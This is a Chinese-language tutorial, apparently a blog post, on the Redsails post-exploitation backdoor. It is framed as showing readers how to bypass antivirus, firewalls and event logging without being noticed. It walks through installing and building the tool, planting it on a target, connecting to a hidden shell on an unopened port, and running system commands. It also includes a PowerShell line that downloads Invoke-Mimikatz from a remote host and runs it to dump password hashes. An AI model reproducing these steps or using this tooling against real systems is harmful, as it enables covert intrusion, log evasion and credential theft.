超級隱蔽之後門技巧
前言
在我們以往的滲透測試中,經常會遇到目標存在殺軟,防火牆等防護軟體的情況,導致我們的連線不穩定以及連線中斷等情況,今天就教大家如何悄無聲息的繞過層層防護開啟一個愉快的滲透之旅,請抓緊坐好,準備開車了。
Redsails是使用python開發的一款後滲透測試工具,其目的是可以使我們在目標主機上執行命令且無需建立任何事件日誌以及網路連線,詳細作用如下:
在目標主機持續建立連線
繞過許多常見的事件日誌
產生虛假日誌/網路流量
Redsails依賴於PyDivert、Pycrypto和WinDivert包,我們可以使用以下命令進行安裝:
pip install pydivert
pip install pbkdf2
easy_install pycrypto
在安裝pycrypto之前,還需要Microsoft Visual C ++編譯器。
建立可執行檔案
pip install pyinstaller
pyinstaller-script.py -F --clean redSails.spec
用法
在目標主機上執行:
redsails.exe -a <IP Address> -p <password> -o <port>
在本地進行監聽,使用相同的密碼就可以獲得一個shell
python redsailsClient.py -t <IP Address> -p <password> -o <port>
這時候神奇的事情發生了,我們看到shell已經連線成功,但是並未建立新的連線,連線埠也一直處於監聽狀態。而更加神奇的是即使目標主機上並未開放我們的連線埠,我們也可以正常進行連線,並且不會建立新的連線。
如圖,我們使用了22埠進行了連線,但是在目標主機上並未開放22埠,並且也沒有任何關於22埠的連線資訊。連線成功之後,我們便可以通過redsails控制檯在目標主機上執行系統命令了,執行命令方法如下:
SHELL::net users
SHELL::whoami
SHELL::ipconfig
Redsails也支援PowerShell,因此它可以執行PowerShell命令。
例如我們想對目標的hash進行抓取,我們可以這樣呼叫Powershell指令碼來執行:
PSHELL::IEX(New-Object Net.WebClient).Downloadstring('http://192.168.100.2/tmp/Invoke-Mimikatz.ps1');Invoke-Mimikatz
也可以利用powershell與Metasploit進行互動,不過這樣就會建立一個新的連線,容易被防護系統檢測到。
相關文章
- 簡單又較隱蔽的PHP後門PHP
- Linux終端注意了!隱蔽性更強的後門木馬Rmgr來了Linux
- ICMP隱蔽隧道攻擊分析與檢測(二)
- ICMP隱蔽隧道攻擊分析與檢測(三)
- ICMP隱蔽隧道攻擊分析與檢測(四)
- 【技術向】利用ShadowMove巧妙的隱蔽連線
- 學習內網安全--隱蔽隧道通訊技術內網
- 一次慢查詢暴露的隱蔽問題
- 門羅幣隱私保護之隱形地址
- MacBook中的那些超級實用小技巧Mac
- 利用SSH隧道加密技術隱蔽C&C通訊流量加密
- HTML語義化,一圖以蔽之HTML
- MongoDB 那些事(一文以蔽之)MongoDB
- 利用.user.ini檔案隱藏後門
- Powershell之MOF後門
- 技術:超級實用的電腦小技巧
- suffice it to say 一言以蔽之
- 超級簡單的sql入門(一)SQL
- APICloud開發者進階之路 | 超級實用技巧APICloud
- 辦公組必備的入門級Excel技巧Excel
- Mac新手別錯過,超實用的5個Mac隱藏小技巧Mac
- 超級簡單入門vuex 小例項Vue
- 【應試技巧(一)】10條超級實用的一消案例分析答題技巧!
- 幾個超級實用但很少人知道的 VS 技巧
- MySQL超級複雜? 恆訊科技分享幾個使用技巧MySql
- 門羅幣隱私保護之環簽名
- MySQL隱碼攻擊技巧MySql
- 前端入門技巧之瀏覽器除錯前端瀏覽器除錯
- Web應用隱形後門的設計與實現Web
- 研究人員新發現一種極為隱蔽的Linux惡意軟體Linux
- 幾個超級實用但很少人知道的 VS 技巧[更新]
- 門羅幣隱私保護之範圍證明
- 有一級域名之後,如何申請二級域名?
- 廢掉一個人最隱蔽的方式,是讓他忙到沒時間成長
- 超級實用的Excel技巧,不會的趕緊get起來Excel
- 五年之後超過10000訂閱者
- 微軟和OpenAI計劃斥資1000億美元打造星際之門超級計算機微軟OpenAI計算機
- macOS 訪達的隱藏小技巧Mac